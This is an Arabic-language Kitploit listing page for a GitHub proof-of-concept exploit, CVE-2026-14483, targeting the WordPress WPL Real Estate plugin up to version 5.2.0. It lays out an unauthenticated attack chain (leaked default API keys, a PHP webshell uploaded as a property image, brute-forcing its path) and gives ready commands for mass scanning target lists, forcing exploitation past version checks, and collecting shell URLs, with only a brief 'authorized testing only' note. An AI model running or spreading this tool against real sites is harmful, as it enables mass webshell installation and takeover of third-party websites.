Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-14483 — CVE-2026-14483 POC EXPLOIT بواسطة MADEXPLOITS | Kitploit
أدوات/GitHubGitHub/madexploits/cve-2026-14483
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقتطوير الحمولات
GitHubmadexploits/cve-2026-14483

CVE-2026-14483

CVE-2026-14483 POC EXPLOIT بواسطة MADEXPLOITS

عرض المستودع
19منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-14483 — RCE في WPL Real Estate

تنفيذ أوامر عن بُعد بدون مصادقة ضد البرنامج المساعد Realtyna WPL Real Estate Listing الخاص بـ WordPress.

الحقلالتفاصيل
CVECVE-2026-14483
الإصدار المتأثر<= 5.2.0
البرنامج المساعدreal-estate-listing-realtyna-wpl
التأثيررفع ويبشيل PHP بدون مصادقة (RCE)
السكربتCVE-2026-14483.py
المؤلفMADEXPLOITS

بشكل افتراضي، يستغل السكربت فقط الأهداف التي تعمل بالإصدار 5.2.0 من WPL. استخدم --force لتجاوز هذا السلوك.

صورة


ملخص الثغرة

  1. تسريب بيانات الاعتماد — يتم كشف api_key / api_secret الافتراضية من خلال تفريغ SQL عام لملفات الترحيل.
  2. رفع بدون مصادقة — تُستخدم بيانات الاعتماد هذه للتوثيق على WPL I/O API (set_property)، مما يسمح برفع ملف PHP مُصمَّم خصيصًا كصورة عقار.
  3. اكتشاف الويبشيل — توجد الصدفة المرفوعة في المسار wp-content/uploads/WPL/{property_id}/.

المتطلبات

pip install requests colorama
  • Python 3.8+
  • وصول شبكي إلى الهدف (الأهداف)

الاستخدام

قائمة الأهداف

أنشئ ملفًا نصيًا يحتوي على عنوان أساسي واحد في كل سطر:

http://wplab.test
https://example.com

تشغيل أساسي

python CVE-2026-14483.py --targets targets.txt

تُلحق روابط الصدفات الناجحة بملف result.txt (أو --output).

الخيارات الكاملة

python CVE-2026-14483.py \
  --targets targets.txt \
  --output result.txt \
  --user-id 1 \
  --max-id 1000 \
  --timeout 30 \
  --threads 5 \
  --debug \
  --force
الوسيطالافتراضيالوصف
--targets(مطلوب)ملف يحتوي على العناوين الأساسية (واحد في كل سطر)
--outputresult.txtملف تُلحق به روابط الصدفات المكتشفة
--user-id1معرف مستخدم WordPress / WPL الذي يملك العقار الجديد
--payloadصدفة الرفع المدمجةسلسلة حمولة PHP مخصصة
--max-id1000أقصى معرف عقار للاختراق القسري عند تحديد موقع الصدفة
--timeout30مهلة HTTP بالثواني
--threads5عدد خيوط العمل المتزامنة
--debugoffتسجيل تصحيح مفصّل
--forceoffالاستغلال حتى لو كان الإصدار ≠ 5.2.0 أو تعذّر اكتشافه

تدفق الاستغلال

Target URL
    │
    ▼
Detect WPL version (readme.txt / wpl.php)
    │  skip unless == 5.2.0 (or --force)
    ▼
Fetch api_key + api_secret from:
  /wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
    │
    ▼
POST set_property via WPL I/O API
  (upload image_0x89MADEXPLOITS.php as image/jpeg)
    │
    ▼
Brute-force property ID 1..max-id
  /wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
    │
    ▼
Write shell URL → output file

علامة الصدفة الافتراضية: MADEXPLOITS
اسم الملف البعيد الافتراضي: 0x89MADEXPLOITS.php


أمثلة

هدف مخبري واحد (بيئة العمل هذه):

echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug

فحص جماعي بتزامن أعلى:

python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt

إجبار الاستغلال عند فشل فحص الإصدار:

python CVE-2026-14483.py --targets targets.txt --force

المخرجات

[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.

يحتوي result.txt على رابط صدفة واحدة في كل سطر.


ملاحظات

  • تتم قراءة الإصدار من Stable tag: / Version: في ملف readme.txt الخاص بالبرنامج المساعد، مع التراجع إلى wpl.php.
  • إذا لم يتم العثور على الصدفة بعد الرفع، ارفع قيمة --max-id.
  • مخصص لاختبارات الأمان المصرّح بها / الاستخدام المخبري المحلي فقط.
تنزيل الأداة